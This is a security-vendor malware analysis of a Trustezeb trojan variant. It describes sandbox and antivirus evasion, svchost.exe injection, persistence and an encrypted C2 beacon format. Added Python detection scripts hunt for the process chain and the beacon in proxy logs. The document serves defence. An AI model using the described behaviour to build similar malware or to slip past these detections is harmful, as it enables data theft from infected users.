A new Trustezeb variant spammed in the wild

August 30, 2013

The Dell SonicWall Threats Research team has observed incidents of a new Trustezeb variant being delivered via e-mail spam and drive-by downloads in the wild. The malware executable is compiled with Microsoft Visual C++ and contains two malicious executables embedded in it that get run on the target machine. The dropped executable sends sensitive information to a remote server and waits for further commands.

Sample e-mail containing the new Trustezeb variant as an attachment:

Infection Cycle:

Upon execution, the Trojan takes a snapshot of the running processes and checks for the presence of a Sandboxie environment as well as the Avast antivirus program:

The Trojan creates a mutex UACMutexxxxx to mark its presence on the system.

It attempts to stop the Microsoft Windows firewall by running the following command:

The Trojan then creates a new svchost.exe process, injects into it one of the two embedded executables (decrypted at runtime), and runs it. The newly created process checks whether its parent process is running from the %Temp% folder and whether the parent's file extension is .pre. If not, it drops a copy of the original malware executable into the %Temp% directory as (RandomName).pre and runs it. The infection cycle can be seen below:

The Trojan creates a registry entry to ensure that it runs on system reboot.
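The spawning chain described above (dropper -> svchost.exe -> (RandomName).pre in %Temp% -> svchost.exe) leaves a process-tree shape that is easy to hunt for. The following is an added detection example, not code from the original writeup or from Dell SonicWALL: it walks a list of process records and flags any image that is a .pre file in the temp directory, and any svchost.exe whose parent is not services.exe or runs from %Temp%. The process records, PIDs and the temp path are constructed sample data; on a live host you would feed it the output of a process listing and the real TEMP path.

```python
import ntpath
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class Proc:
    """One row of a process listing (constructed for this example)."""
    pid: int
    ppid: int
    name: str
    image_path: str


# Assumed temp directory for the sample data; on a real host use os.environ["TEMP"].
TEMP_DIR = r"C:\Users\victim\AppData\Local\Temp"


def in_temp(path: str, temp_dir: str = TEMP_DIR) -> bool:
    """True when the image lives directly in the temp directory (case-insensitive)."""
    return ntpath.normcase(ntpath.dirname(path)) == ntpath.normcase(temp_dir)


def flag_processes(procs: List[Proc], temp_dir: str = TEMP_DIR) -> Dict[int, List[str]]:
    """Return {pid: [reasons]} for processes matching the Trustezeb infection cycle."""
    by_pid = {p.pid: p for p in procs}
    findings: Dict[int, List[str]] = {}
    for p in procs:
        reasons: List[str] = []
        ext = ntpath.splitext(p.image_path)[1].lower()
        # Stage 2 of the cycle: a copy of the dropper written as (RandomName).pre in %Temp%.
        if in_temp(p.image_path, temp_dir) and ext == ".pre":
            reasons.append("image is a .pre file in %Temp%")
        if p.name.lower() == "svchost.exe":
            parent: Optional[Proc] = by_pid.get(p.ppid)
            # A genuine svchost.exe is started by services.exe; the injected host is not.
            if parent is None or parent.name.lower() != "services.exe":
                who = parent.name if parent else "unknown"
                reasons.append(f"svchost.exe spawned by {who} instead of services.exe")
            # The second svchost.exe is spawned by the .pre copy running from %Temp%.
            if parent is not None and in_temp(parent.image_path, temp_dir):
                reasons.append("svchost.exe parent runs from %Temp%")
        if reasons:
            findings[p.pid] = reasons
    return findings


# Constructed process tree: a clean services.exe -> svchost.exe pair next to the
# dropper chain invoice.exe -> svchost.exe -> abc123.pre -> svchost.exe.
SAMPLE_PROCS = [
    Proc(600, 500, "services.exe", r"C:\Windows\System32\services.exe"),
    Proc(800, 600, "svchost.exe", r"C:\Windows\System32\svchost.exe"),
    Proc(1000, 900, "explorer.exe", r"C:\Windows\explorer.exe"),
    Proc(1200, 1000, "invoice.exe", r"C:\Users\victim\Downloads\invoice.exe"),
    Proc(1250, 1200, "svchost.exe", r"C:\Windows\System32\svchost.exe"),
    Proc(1300, 1250, "abc123.pre", TEMP_DIR + r"\abc123.pre"),
    Proc(1400, 1300, "svchost.exe", r"C:\Windows\System32\svchost.exe"),
]

if __name__ == "__main__":
    for pid, reasons in sorted(flag_processes(SAMPLE_PROCS).items()):
        print(pid, "; ".join(reasons))
```

The parent check is the robust part of this heuristic: the mutex name and the exact registry key are not reproduced in the writeup, and the .pre file is deleted or renamed trivially, but an svchost.exe whose parent is anything other than services.exe is anomalous on its own and survives variant changes.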

The dropped malware executable that gets injected into svchost.exe gathers sensitive information on the target machine and reports it back to the Command & Control server in encrypted form via an HTTP GET request. The format of the GET request used by the malware:

    GET /img_cache.php?text=(RANDOMLY GENERATED KEY BLOCK)&img_url=http://(SENSITIVE SYSTEM DATA).(bmp/jpg/png/pcx)&rpt=simage&pos=(INT)

A sample request looks like the following:

The decrypted version of the data being transmitted in above request contains the following information:

    DISKVOLUME_INFO USERNAME:USERID:OPERATING_SYSTEM:SYSTEM_DEFAULT_LANGUAGE_ID:OS_VERSION
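Because the text= key block is randomly generated per request and the encrypted system data changes per host, a network detection has to match the structure of the beacon rather than any value in it. The following is an added example, not code from the original writeup or from Dell SonicWALL: it matches the GET format quoted above (path /img_cache.php, a text= key block, an img_url= whose host part is the encrypted data ending in .bmp/.jpg/.png/.pcx, rpt=simage and an integer pos=) and runs the check over proxy log lines. The log lines, client addresses and the .invalid hostnames are constructed for the example; the real C2 host list from the writeup is not reproduced, and the encryption of the payload is not specified, so the payload is only extracted, not decrypted.

```python
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Structure taken from the GET format quoted in the writeup.
TRUSTEZEB_PATH = "/img_cache.php"
IMG_URL_RE = re.compile(r"^http://([^/?#]+)\.(bmp|jpg|png|pcx)$", re.IGNORECASE)
# Proxy-style access log line: the absolute URL sits between "GET " and " HTTP/".
GET_LINE_RE = re.compile(r'^(?P<client>\S+) .*"GET (?P<url>\S+) HTTP/')


def match_trustezeb_beacon(url: str) -> Optional[Dict[str, str]]:
    """Return the beacon's fields when url has the Trustezeb check-in shape, else None."""
    parts = urlsplit(url)
    if parts.path != TRUSTEZEB_PATH:
        return None
    q = parse_qs(parts.query, keep_blank_values=True)
    fields = {}
    for name in ("text", "img_url", "rpt", "pos"):
        values = q.get(name, [])
        if len(values) != 1:          # each parameter must appear exactly once
            return None
        fields[name] = values[0]
    if fields["rpt"] != "simage" or not fields["pos"].isdigit() or not fields["text"]:
        return None
    m = IMG_URL_RE.match(fields["img_url"])
    if not m:
        return None
    return {
        "c2_host": parts.netloc,
        "key_block": fields["text"],
        "payload": m.group(1),        # encrypted system data; encryption not specified
        "ext": m.group(2).lower(),
        "pos": fields["pos"],
    }


def scan_proxy_log(lines: List[str]) -> List[Tuple[str, Dict[str, str]]]:
    """Return (client, beacon fields) for every log line that matches the beacon."""
    hits = []
    for line in lines:
        m = GET_LINE_RE.match(line)
        if not m:
            continue
        beacon = match_trustezeb_beacon(m.group("url"))
        if beacon:
            hits.append((m.group("client"), beacon))
    return hits


# Constructed sample log: one beacon, one benign request to a same-named script,
# and one request with the right parameters on the wrong path.
SAMPLE_LOG = [
    '10.0.0.5 - - [30/Aug/2013:10:12:01 +0000] "GET http://c2.example.invalid'
    '/img_cache.php?text=QkxPQ0s&img_url=http://ZGF0YQ.bmp&rpt=simage&pos=1 HTTP/1.1" 200 512',
    '10.0.0.7 - - [30/Aug/2013:10:12:05 +0000] "GET http://cdn.example.invalid'
    '/img_cache.php?size=200&id=17 HTTP/1.1" 200 4410',
    '10.0.0.9 - - [30/Aug/2013:10:12:09 +0000] "GET http://www.example.invalid'
    '/index.php?text=hello&img_url=http://x.jpg&rpt=simage&pos=2 HTTP/1.1" 200 10',
]

if __name__ == "__main__":
    for client, beacon in scan_proxy_log(SAMPLE_LOG):
        print(client, "->", beacon["c2_host"], "payload:", beacon["payload"])
```

A proxy or IDS rule built the same way (fixed path, fixed rpt=simage, img_url host followed only by an image extension, no real path) will fire on this beacon regardless of which of the hardcoded servers the sample picks; pairing it with the C2 host list from the writeup gives a higher-confidence second signature.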

A list of hardcoded Command & Control servers extracted during our analysis can be seen below:

The malicious process then waits for commands from the remote server. We saw support for the following commands in the injected code:

  • URLS
  • UPGRADE
  • UPGRADEURL
  • EXECUTE
  • LOAD
  • EXECDLL
  • LOADDLL
  • WAIT
  • KILL
  • MAINER
  • MAINERFILE

Dell SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

  • GAV: Trustezeb.E (Trojan)